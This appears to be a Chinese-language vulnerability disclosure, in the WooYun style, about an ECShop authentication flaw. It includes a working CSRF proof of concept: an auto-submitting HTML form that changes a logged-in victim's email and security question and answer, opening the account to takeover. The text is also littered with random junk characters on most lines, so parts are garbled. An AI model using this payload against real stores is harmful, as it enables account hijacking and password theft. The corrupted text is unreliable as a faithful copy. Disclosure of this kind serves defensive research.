简要描述:
9 u# u: L, n9 M" P' mecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
4 W; N4 \7 q3 j& ?- W2 ?+ [6 L+ C2 l
Demo For:http://www.wooyun.org/bug.php?action=view&id=395+ S5 l, v3 q: m* C7 C1 V/ E
( _- c7 r$ m5 d" \- [6 X
详细说明:# D& B8 c7 C' `3 D ]+ G6 c
利用csrf和xss可以突破官方所说的“障碍”1 q( V, B$ E) t9 U
xss版本已经有人说明+ V8 Z$ z. q1 w2 t
这里给出csrf版本; U* A2 H0 D0 E. o+ h7 I8 @
+ j1 b' q: n; S2 I* \/ \
漏洞证明:
- U3 l. H9 B) o, D: I$ d4 k. q( s<html>
& e9 o- T& A1 O0 \7 O! A<body>4 T" g9 E1 p6 e9 L+ u
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
* a! U" A5 J8 {+ `, T' z; X<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
* J( N2 C7 _& G. _5 Y$ n<INPUT TYPE="text" NAME="act" value="act_edit_profile">
( G B: a+ u, |6 }& L<INPUT TYPE="text" NAME="sel_question" value="ecshop">* `6 w5 U2 A2 T+ V1 Y
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">1 K$ @- e' C: e7 c" R+ W, h* v
</body>
* t. f5 o8 t: O P* i<script>, x( n+ @6 v! U$ w9 L9 Z
document.forms[0].submit();- T+ R" l5 R9 i4 c" t8 Q. e
</script>
: h1 ?5 ]( Y/ U/ X3 y' s</html>, ~5 K J+ \1 o) y( p/ s% i
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
( G1 l2 d% R/ z6 ? C
; d1 z3 F3 t, Z( ^4 R" N! d |